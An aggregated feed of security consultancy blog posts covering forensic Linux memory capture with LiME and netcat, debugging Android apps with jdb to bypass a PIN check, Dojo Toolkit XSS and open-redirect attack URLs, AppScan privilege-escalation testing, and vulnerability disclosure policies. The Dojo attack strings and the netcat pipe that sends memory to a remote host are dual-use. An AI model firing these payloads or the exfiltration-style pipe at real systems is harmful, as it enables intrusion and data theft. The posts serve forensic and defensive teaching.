Fixing CSR: Of course, CSRF token validation will save here. So random token (per request) should be there in every request form and validate at server side.


Acquiring Linux Memory from a Server Far Far Away

$
0
0
By Dan Caban.

In the past it was possible to acquire memory from linux systems by directly imaging (with dd) psudo-device files such as /dev/mem and /dev/kmem. In later kernels, this access was restricted and/or removed. To provide investigators and system administrator’s unrestricted access, loadable kernel modules were developed and made available in projects such as fmem and LiME (Linux Memory Extractor).

In this blog post I will introduce you to a scenario where LiME is used to acquire memory from a CentOS 6.5 x64 system that is physically hosted in another continent.

LiME is a Loadable Kernel Module (LKM). LKM’s are typically designed to extend kernel functionality, and can be inserted by a user with root privileges. This sounds a little scary, and it does introduce tangible risks if done wrong. But on the positive side:

  • the LiME compiled LKM is rather small
  • the process does not require a restart
  • the LKM can be added/removed quickly
  • the resulting memory dump can be transferred over the network without writing to the local disk; and
  • the memory dump is compatible with Volatility


Getting LiME

Since LiME is distributed as source without any binaries you need to compile it yourself. You will find documentation on the internet suggesting that you jump right in and compile LiME on your target system. I recommend you first see if a pre-compiled LKM exists, or alternatively compile and test in a virtual machine first.

In either case, you first need to determine the kernel running on your target system, as the LKM you use must have been compiled on the the exact operating system, kernel version and architecture. Here we determine our target is running the kernel 2.6.32-431.5.1.el6.x86_64.

[centos@targetsystem ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.5.1.el6.x86_64 #1 SMP Wed Feb 12 00:41:43 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux



One great reputable resource for pre-compiled LiME LKM’s is the Linux Forensics Tools Repository at Cert.org. They provide a RPM repository of forensic tools for Red Hat Enterprise Linux, CentOS and Fedora.

To check to see your specific kernel is compiled for your operating system, visit Cert and find the “repoview” for your target operating system.



Browse to “applications/forensics tools” and view the documentation on “lime-kernel-objects”.

As of today's date the following kernels have pre-compiled LiME LKM’s for CentOS 6 / RHEL 6:

2.6.32-71
2.6.32-71.14.1
2.6.32-71.18.1
2.6.32-71.24.1
2.6.32-71.29.1
2.6.32-71.7.1
2.6.32-131.0.15
2.6.32-220
2.6.32-279
2.6.32-358.0.1
2.6.32-358.11.1
2.6.32-358.14.1
2.6.32-358.18.1
2.6.32-358.2.1
2.6.32-358.23.2
2.6.32-358.6.1
2.6.32-431
2.6.32-431.1.2.0.1
2.6.32-431.3.1



Oh no! The kind folks at Cert are not completely up to date, and my target system is running a newer kernel. That means I have to do the heavy lifting myself.

I installed CentOS 6.5 x64 in a virtual machine and updated until I had the latest kernel matching 2.6.32-431.5.1.el6.x86_64.

[root@vmtest ~]$ yum update
[root@vmtest ~]$ yum upgrade



Since this was a kernel upgrade, I gave my virtual machine a reboot.

[root@vmtest ~]$ shutdown -r now



We now have the matching kernel, but we still need the associated kernel headers and source as well as the tools needed for compiling.

[root@vmtest ~]$ yum install gcc gcc-c++ kernel-headers kernel-source




Now we are finally ready to download and compile our LiME LKM!

[root@vmtest ~]# mkdir lime; cd lime
[root@vmtest lime]# wget https://lime-forensics.googlecode.com/files/lime-forensics-1.1-r17.tar.gz
[root@vmtest lime]# tar -xzvf lime-forensics-1.1-r17.tar.gz
[root@vmtest lime]# cd src
[root@vmtest src]# make
….
make -C /lib/modules/2.6.32-431.5.1.el6.x86_64/build M=/root/lime/src modules

[root@vmtest src]# ls lime*.ko
lime-2.6.32-431.5.1.el6.x86_64.ko



Conducting a test run

We can now test out our newly built LiME LKM on our virtual machine by loading the kernel module and dumping memory to a local file.

We are opting to create our memory image on the local file system, so I provide the argument path=/root/mem.img. LiME supports raw, padded and “lime” formats. Since volatility supports the lime format, I have provided the argument format=lime.

[root@vmtest ~]# insmod lime-2.6.32-431.5.1.el6.x86_64.ko "path=/root/mem.img format=lime"



I have validated the memory images matches the amount of RAM I allocated to the virtual machine (1GB) and that it contains valid content.

[root@vmtest ~]# ls -lah /root/mem.img 
-r--r--r--. 1 root root 1.0G Mar 9 08:11 /root/mem.img
[root@vmtest ~]# strings /root/mem.img | head -n 3
EMiL
root (hd0,0)
kernel /vmlinuz-2.6.32-431.5.1.el6.x86_64 ro root=/dev/mapper/vg_livecd-lv_root rd_NO_LUKS



I can now remove the kernel module with one simple command:

[root@vmtest ~]# rmmod lime



Acquiring memory over the internet

Now we return to our scenario where we are trying to capture memory from a CentOS server on another continent. I opted to upload LiME LKM to a server I control and then download it via HTTP.

[root@targetserver ~]# wget http://my.server-on-the-internet.com/lime-2.6.32-431.5.1.el6.x86_64.ko




The great thing about LiME is that it is not limited to just output to a local disk or physical file. In our test run we supplied an output path with the argument path=/root/mem.img. We will instead create a TCP service using the argument path=tcp:4444.

[root@targetserver ~]# insmod lime-2.6.32-431.5.1.el6.x86_64.ko "path=tcp:4444 format=lime"




If I were situated within our clients network or port 4444 was open over the internet, I could simply use netcat to connect and transfer the memory image to my investigative laptop.

[dan@investigativelaptop ~]# nc target.server.com 4444 > /home/dan/evidence/evidence.lime.img




Since in this scenario our server is on the internet, and a restrictive firewall is inline we are forced to get creative.

Remember how I downloaded the LiME LKM to the target server via HTTP (port 80)? That means the server can make outbound TCP connections via that port.

I can setup a netcat listener on my investigative laptop here in our lab, and opened it up to the internet. I did this by configuring my firewall to pass traffic on this port to my local LAN address, and you can achieve the same results with most routers designed for home/small office with port forwarding.

Step 1: setup netcat server at our lab listening on port 80.

[dan@investigativelaptop ~]# nc –l 80 > /home/dan/evidence/evidence.lime.img



Step 2: Run LiME LKM and configure it to wait for TCP connections on port 4444.

[root@targetserver ~]# insmod lime-2.6.32-431.5.1.el6.x86_64.ko "path=tcp:4444 format=lime"



On the target server I can now use a local netcat connection that is piped to a remote connection in our lab via port 80 (where 60.70.80.90 is our imaginary lab IP address.)

Step 3: In another shell initiate the netcat chain to transfer the memory image to my investigative laptop at our lab.

[root@targetserver ~]# nc localhost 4444 | nc 60.70.80.90 80




Voila! I now have a memory image on my investigative laptop and can start my analysis.

Below is a basic visualization of the process:



Memory Analysis with Volatility

Volatility ships with many prebuilt profiles for parsing memory dumps, but they are focused exclusively the Windows operating system. To perform memory analysis on a sample collected from linux, we need to first create a profile that matches the exact operating system, kernel version and architecture (surprise, surprise!) So let’s head back to our virtual machine where we will need to collect the required information to create a linux profile:

  • the debug symbols (System.map*);
    • Requirements: access to the test virtual machine system running on the same operating system, kernel version and architecture
  • and information about the kernel’s data structures (vtypes).
    • Requirements: Volatility source and the necessary tools to compile vtypes running on the same operating system, kernel version and architecture.


First let’s create a folder for collection of required files.

cd ~
mkdir -p volatility-profile/boot/
mkdir -p volatility-profile/volatility/tools/linux/



Now let’s collect the debug symbols. On a CentOS system it is located in /boot/ directory. We will need to find the System.map* file that matches the active kernel version that was running when we collected the system memory (2.6.32-431.5.1.el6.x86_64).

[root@vmtest ~]# cd /boot/
[root@vmtest boot]# ls -lah System.map*
-rw-r--r--. 1 root root 2.5M Feb 11 20:07 System.map-2.6.32-431.5.1.el6.x86_64
-rw-r--r--. 1 root root 2.5M Nov 21 22:40 System.map-2.6.32-431.el6.x86_64



Copy the appropriate System.map file to the collection folder.

[root@vmtest boot]# cp System.map-2.6.32-431.5.1.el6.x86_64 ~/volatility-profile/boot/



One of the requirements to compile the vtypes is libdwarf. While this may be easily installed on some operating systems using apt-get or yum, CentOS 6.5 requires that we borrow and compile the source from the Fedora Project. The remaining prerequisites for compiling should have been installed when we compiled LiME earlier in the section Getting LiME.

[root@vmtest boot]# cd ~
[root@vmtest ~]# mkdir libdwarf
[root@vmtest libdwarf]# cd libdwarf/
[root@vmtest libdwarf]# wget http://pkgs.fedoraproject.org/repo/pkgs/libdwarf/libdwarf-20140208.tar.gz/4dc74e08a82fa1d3cab6ca6b9610761e/libdwarf-20140208.tar.gz
[root@vmtest libdwarf]# tar -xzvf libdwarf-20140208.tar.gz
[root@vmtest dwarf-20140208]# cd dwarf-20140208/
[root@vmtest dwarf-20140208]#./configure
[root@vmtest dwarf-20140208]# make
[root@vmtest dwarfdump]# cd dwarfdump
[root@vmtest dwarfdump]# make install




Now we can obtain a copy of the Volatility source code and compile the vtypes.

[root@vmtest dwarfdump]# cd ~
[root@vmtest ~]# mkdir volatility
[root@vmtest ~]# cd volatility
[root@vmtest volatility]# cd volatility
[root@vmtest volatility]# wget https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz
[root@vmtest volatility]# tar -xzvf volatility-2.3.1.tar.gz
[root@vmtest volatility]# cd volatility-2.3.1/tools/linux/
[root@vmtest linux]# make



After successfully compiling the vtypes, we will copy the resulting module.dwarf back out to the collection folder.

[root@vmtest linux]# cp module.dwarf ~/volatility-profile/volatility/tools/linux/



Now that we have our collected the two requirements to create a system profile, let’s package them into a ZIP file, as per the requirements of Volatility.

[root@vmtest linux]# cd ~/volatility-profile/
[root@vmtest volatility-profile]# zip CentOS-6.5-2.6.32-431.5.1.el6.x86_64.zip boot/System.map-2.6.32-431.5.1.el6.x86_64 volatility/tools/linux/module.dwarf
adding: boot/System.map-2.6.32-431.5.1.el6.x86_64 (deflated 80%)
adding: volatility/tools/linux/module.dwarf (deflated 90%)




On my investigative laptop I could drop this ZIP file in the default volatility profile directory, but I would rather avoid losing it in the future due to upgrades/updates. I instead will create a folder to manage my custom profiles and reference it when running volatility.

[dan@investigativelaptop evidence]# mkdir -p ~/.volatility/profiles/
cp CentOS-6.5-2.6.32-431.5.1.el6.x86_64.zip ~/.volatility/profiles/



Now I can confirm Volatility recognizes providing the new plugin directory.

[dan@investigativelaptop evidence]# vol.py --plugins=/home/dan/.volatility/profiles/ --info | grep -i profile | grep -i linux
Volatility Foundation Volatility Framework 2.3.1
LinuxCentOS-6_5-2_6_32-431_5_1_el6_x86_64x64 - A Profile for Linux CentOS-6.5-2.6.32-431.5.1.el6.x86_64 x64



Now I can start running the linux_ prefixed plugins that come shipped with Volatility to conduct memory analysis.

dan@investigativelaptop evidence]# vol.py --plugins=/home/dan/.volatility/profiles/ --profile=LinuxCentOS-6_5-2_6_32-431_5_1_el6_x86_64x64 linux_cpuinfo -f /home/dan/evidence/evidence.lime.img
Volatility Foundation Volatility Framework 2.3.1
Processor Vendor Model
------------ ---------------- -----
0 GenuineIntel Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
1 GenuineIntel Intel(R) Xeon(R) CPU X5560 @ 2.80GHz





About the Author

Dan Caban (EnCE, CCE, ACE) works as a Principal Consultant at McAfee Foundstone Services EMEA based out of Dubai, United Arab Emirates.

References



Debugging Android Applications

$
0
0
By Naveen Rudrappa.

Using a debugger to manipulate application variables at runtime can be a powerful technique to employ while penetration testing Android applications. Android applications can be unpacked, modified, re-assembled, and converted to gain access to the underlying application code, however understanding which variables are important and should be modified is a whole other story that can be laborious and time consuming. In this blog post we'll highlight the benefits of runtime debugging and give you a simple example to get you going!

Debugging is a technique where a hook is attached to a particular application code. Execution pauses once a particular piece of code is reached, giving us the ability to analyze local variables, dump class values, modify values, and generally interact with the program state. Then when we're ready, we can resume execution.

Required Tools

If you have done any work with Android applications, you shouldn't need any new tools:

  1. The application's installationation package
  2. Java SDK
  3. Android SDK
Reverse engineering has got prominent role while, penetration testing the android applications. Reversing android applications is helpful in below 2 scenarios:

Debuggable

The AndroidManifest.xml contained within the application's .apk actually has a android:debuggable setting which allows the application to be debuggable. So we'll need to use the APK Manager to decompress the installation package and add android:debuggable="true".



Attaching

We'll need to attach the debugger to our application in order for us to debug it. Using adb jdwp, we can list all of the running applications and as long as the target application was the last to be loaded, we can reliably guess that the last process ID on the list is ours.



Next we'll need to forward our debugging session to a port we can connect to with our debugger:

 adb forward tcp:8000 jdwp:498 


Finally we can attach the debugger with:

 jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8000 


With the debugger attached, we can set breakpoints at the required functions and analyze the application behavior at runtime. To identify function names, you can decompile the application to dex and use that code to guide your debugging session.

Some the useful JDB commands for debugging:

  1. stop in [function name] - Set a breakpoint
  2. next - Executes one line
  3. step - Step into a function
  4. step up - Step out of a function
  5. print obj - Prints a class name
  6. dump obj - Dumps a class
  7. print [variable name] - Print the value of a variable
  8. set [variable name] = [value] - Change the value of a variable

An Exercise for You!



This application is a pretty simple one. Upon entering correct PIN, that is 1234, application responds with message “correct PIN entered”. Upon entering any value apart from 1234 application responds with message “Invalid PIN”. Bypass this logic via debugging so that for any invalid PIN application responds with message “correct PIN entered”. For solution refer below image it summarizes all the command need to complete the challenge.



Dojo Toolkit and Risks with Third Party Libraries

$
0
0
By Deepak Choudhary.

3rd party libraries can become critical components of in-house developed applications, while the benefits to using them is huge, there is also some risks to consider. In this blog post we'll look at a common 3rd party component of many web applications, Dojo Toolkit. After noticing it was included during a recent web application penetration test, it became clear that the version incorporated within the application was vulnerable, and ultimately exposed the entire application to attack.

Dojo Toolkit

If you haven't encountered Dojo before, just know it is a JavaScript (Javascript/AJAX) library used to design cross-platform web and mobile applications. The framework itself provides various "widgets" that can be used to support a variety of browsers, everything from Safari to Chrome on iPhone to Blackberry.

Documented Vulnerabilities

Dojo has reported some serious security issues in the past such as XSS, DOM-Based XSS, and URL Redirection so its important to stay up to date with the latest version if you leverage it within your application.

Vulnerable version: Dojo 0.4 through Dojo 1.4
Latest Version: Dojo 1.9.3
Reference: http://dojotoolkit.org/ , http://dojotoolkit.org/features/mobile

Files with known vulnerabilities

  • dojo/resources/iframe_history.html
  • dojox/av/FLAudio.js
  • dojox/av/FLVideo.js
  • dojox/av/resources/audio.swf
  • dojox/av/resources/video.swf
  • util/buildscripts/jslib/build.js
  • util/buildscripts/jslib/buildUtil.js
  • util/doh/runner.html
  • /dijit/tests/form/test_Button.html


Prior attack strings

  • http://WebApp/dojo/iframe_history.html?location=http://www.google.com
  • http://WebApp/dojo/iframe_history.html?location=javascript:alert%20%289999%2
  • http://WebApp/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script>
  • http://WebApp/util/doh/runner.html?testUrL='/>foo</script><'"<script>alert(/xss/)</script>
  • http://WebApp/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>
  • dojox/av/FLAudio.js (allowScriptAccess:"always”)
  • dojox/av/FLVideo.js (allowScriptAccess:"always”) and etc.


If you use Dojo, make sure you have an updated version installed or remove these files (if not needed) from the application's directories.

Privilege escalation with AppScan

$
0
0
By Kunal Garg.

Web application vulnerability scanners are a necessary evil when it comes to achieving a rough baseline or some minimum level of security. While they should never be used as the only testament of security for an application, they do provide a level of assurance above no security testing at all. For the security professional, they serve as another tool in the toolbox. All web application scanners are different and some require finer tuning then others. A common question with IBM's AppScan is, "How do you configure it to test only for privilege escalation issues?" In this post, we'll walk you through the steps!

Privilege escalation testing comes handy during authorization testing, when you're looking to tell if one user is authorized to access data or perform actions outside of their role.

Prerequisite

You're first step is to run a post authentication scan with a higher privilege user. In this example, we'll use "FSTESTADMIN". Ideally you'll use a manual crawl so that maximum URL’s are covered.

Configuration

Once the post-authentication scan is complete, follow configure App Scan as follows:

  1. Open a new scan and go to "Scan Configuration"
  2. Go to Login Management and record the login with lower privilege user (Say "FSTESTUSER")
  3. Go to "Test" then "Privilege Escalation" and browse the scan file created previously (scan file for "FSTESTADMIN")



  4. Go to Test Policy, using (CTRL+A) select all tests and uncheck them
  5. In the find section type “escalation” and select all the privilege escalation checks



Once all the above settings are complete run the scan, App Scan will only run tests for Privilege escalation.

This usually creates lots of false positives as App Scan checks for URL’s in the higher privilege scan using the authentication credentials of a lower privilege user. Any URL/pages which are common to both the user will be reported as an issue (false positive in this case).

Approaches to Vulnerability Disclosure

$
0
0
By Brad Antoniewicz.



The excitement of finding a vulnerability in piece of commercial software can quickly shift to fear and regret when you disclose it to the vendor and find yourself in a conversation with a lawyer questioning your intentions. This is an unfortunate reality in our line of work, but you can take actions to protect your butt. In this post, we’ll take a look at how Vulnerability disclosure is handled in standards, by bug hunters, and by large organizations so that you can figure out how to make the best decision for you.

Disclosure Standpoints

While it’s debatable, I think hacking, more specifically vulnerability discovery, started to better the overall community – e.g. we can make the world a better, more secure place by finding and fixing vulnerabilities within the software we use. Telling software maintainers about vulnerabilities we find in their products falls right in line with this idea. However, there is also something else to consider: recognition and sharing. If you spend weeks findings an awesome vulnerability, you should be publically recognized for that effort, and moreover, other’s should also know about your vulnerability so they can learn from it.

Unfortunately, vendors often lack the same altruistic outlook. From a vendor’s perspective, a publically disclosed vulnerability highlights a flaw in their product, which may negatively impact its customer base. Some vendors even interpret vulnerability discovery as a direct attack against their product and even their company. I’ve personally had lawyers ask me “Why are you hacking our company” when I disclosed a vulnerability in their offline desktop application.

As time progressed, vulnerability discovery shifted from a hobby and “betterment” activity to a profitable business. There are plenty of organizations out their selling exploits for undisclosed vulnerabilities. Plus, a seemingly even greater number of criminal or state-sponsored organizations leveraging undisclosed vulnerabilities for corporate espionage and nation-state sponsored attacks. This shift has turned computer hacking from a “hippy” activity to serious business.

The emergence of bug bounty programs has really helped deter bug hunters away from criminal outlets by offering monetary reward and public recognition. It has also demystified how disclosure is handled. However, not all vendors offer a bug bounty program, and many times lawyers may not even be aware of the bug bounty programs available in their own organization, which could put you in a sticky situation if you take the wrong approach to disclosure.

General Approaches

In general, there are three categories of disclosure:

  • Full disclosure– Full details are released publically as soon as possible, often without vendor involvement
  • Coordinated disclosure– Researcher and vendor work together so that the bug is fixed before the vulnerability is disclosed
  • Private or Non-Disclosure – The vulnerability is released to a small group of people (not the vendor) or kept private


These categories broadly classify disclosure approaches but many actual disclosure policies are unique in that they set time limitations on vendor response, etc.. .

Established Disclosure Standards

To give better perspective, let's look at some existing standards that help guide you in the right direction.

  • Internet Engineering Task Force (IETF) – Responsible Vulnerability Disclosure Process - The Responsible Vulnerability Disclosure Process established by this IETF draft is one of the first efforts made to create a process that establishes roles for all parties involved. This process accurately defines the appropriate roles and steps of a disclosure; however it fails to address publication by the researcher if the vendor fails to respond or causes unreasonable delays. At most the process states that the vendor must provide specific reasons for not addressing a vulnerability within 30 days of initial notification.
  • Organization for Internet Safety (OIS) Guidelines for Security Vulnerability Reporting and Response - The OIS guidelines provide further clarification into the disclosure process, offering more detail and establishing terminology for common elements of a disclosure such as the initial vulnerability report (Vulnerability Summary Report), request for confirmation (Request for confirmation receipt), status request (Request for Status), etc.. As with the Responsible Vulnerability Disclosure Process, the OIS Guidelines also do not define a hard time frame for when the researcher may publicize details of the vulnerability. If the process fails, OIS Guidelines define a “Conflict Resolution” step which ultimately results in the ability for parties exit the process, however no disclosure option is provided. The OIS also introduces the scenario where an unrelated third party discloses the same vulnerability – at that time the researcher may disclose without the need for a vendor fix.
  • Microsoft Coordinated Vulnerability Disclosure (CVD) - Microsoft’s Coordinated Vulnerability Disclosure is similar to responsible disclosure in that its aim is to have both the vendor and the researcher (finder) work together to disclose information about the vulnerability at a time after a resolution is reached. However, CVD refrains from defining any specific time frames and only permits public disclosure after a vendor resolution or evidence of exploitation is identified.


Coordinator Policies

Coordinators act on the behalf of a researcher to disclose vulnerabilities to vendors. They provide a level of protection to the researcher and also take on the role of finding an appropriate vendor contact. While coordinators goal is to notify the vendor, they also satisfy the researcher’s aim to share the vulnerability with the community. This sections discusses gives an overview of coordinators policies.

  • Computer Emergency Response Team Coordination Center (CERT/CC) Vulnerability Disclosure Policy - The CERT/CC Vulnerability disclosure policy sets a firm 45 day timeframe from initial report to public disclosure. This occurs regardless of if a patch or workaround is released by the vendor. Exceptions to this policy do exist for critical issues in core components of technology that require a large effort to fix, such as vulnerabilities in standards or core components of an operating system.
  • Zero Day Initiative (ZDI) Disclosure Policy - ZDI is a coordinator that offers monetary rewards for vulnerabilities. It uses the submitted vulnerabilities to generate signatures so that its security products can offer clients early detection and prevention. After making a reasonable effort, ZDI may disclose vulnerabilities within 15 days of initial contact if the vendor does not respond.


Researcher Policies

Security companies commonly support vulnerability research and make their policies publically available. This section provides an overview of a handful:

  • Rapid 7 Vulnerability Disclosure Policy - Rapid7 attempts to contact the vendor via telephone and email then after 15 days, regardless of response, will post its finding to CERT/CC. This combination provides the vendor a potential of 60 days before public disclosure because it is CERT/CC’s policy to wait 45 days.
  • VUPEN Policy - VUPEN is a security research company that adheres to a “commercial responsible disclosure policy”, meaning any vendor who is under contract with VUPEN will be notified of vulnerabilities, however all other vulnerabilities are mostly kept private to fund the organization’s exploitation and intelligence services.
  • Trustwave/SpiderLabs Disclosure Policy - Trustwave makes a best effort approach to contacting the vendor then ultimately puts the decision of public disclosure in its management’s hands if the vendor is unresponsive.

Summary of Approaches

The following table summarizes the approaches mentioned above.

Policy
Notification Emails
Receipt Time Frame
Status Update Time Frame
Verification /Resolution
Time Frame
Disclosure Time Frame
Responsible Vulnerability Disclosure Process

security@
security-alert@
support@
secalert@

And other public info such as domain registrar, etc..

7 days
Every 7 days or otherwise agreed
Vendors make best effort to address within 30 days, can request up to 30 day additional grace period and extensions without defining limits.
After resolution by vendor.
OIS Guidelines for Security Vulnerability Reporting and Response
security@
secure@
security-alert@
secalert@

Alternates:
abuse@
postmaster@
sales@
info@
support@

And other public info such as domain registrar, etc..

7 days, then can send a request for receipt. After three days, go to conflict resolution
Every 7 days or otherwise agreed – Finder can send request for status if vendor does not comply. After three days, go to conflict resolution.
30 day suggestion from vendor receipt, although should be defined on case by case basis.
After resolution by vendor.
Microsoft Coordinated Vulnerability Disclosure
security@
secure@
security-alert@
secalert@
support@
psirt@
info@
sales@

And search engine results, etc..
Not defined
Not defined
Not defined
After resolution by vendor.
CERT/CC Vulnerability Disclosure Process
Not published
Not defined
Not defined
Not defined
45 Days from initial notification

ZDI Disclosure Policy
security@
support@
info@
secure@
5 days then telephone contact.

5 days for telephone response then intermediary
Not defined
6 Months
15 days if no response is provided after initial notification. Up to 6months if notification response is provided
Rapid7
Not defined
15 days after phone/email
Not defined
Not defined
15 days then disclosure to CERT/CC
VUPEN
Not defined
Notification only to customers under contract
Not defined
Not defined
Disclosure only to customers
TrustWave Spider Labs
Not Defined
5 days
5 days
Not defined
If vendor is unresponsive for more than 30 days after initial contact, potential disclosure decided by Trustwave Management.

What to do?

Consider all of the above approaches, and let the vendor know your policy as you disclose it so they are aware. At the end of the day, it's always good to be flexible, and as accomodating as possible to the vendor. However, also be sure the effort is equal, they should be responding in a resonable time and making progress to address the issue.



How do you handle disclosure? Let us know in the comments below!



Viewing all 107 articles
Browse latest View live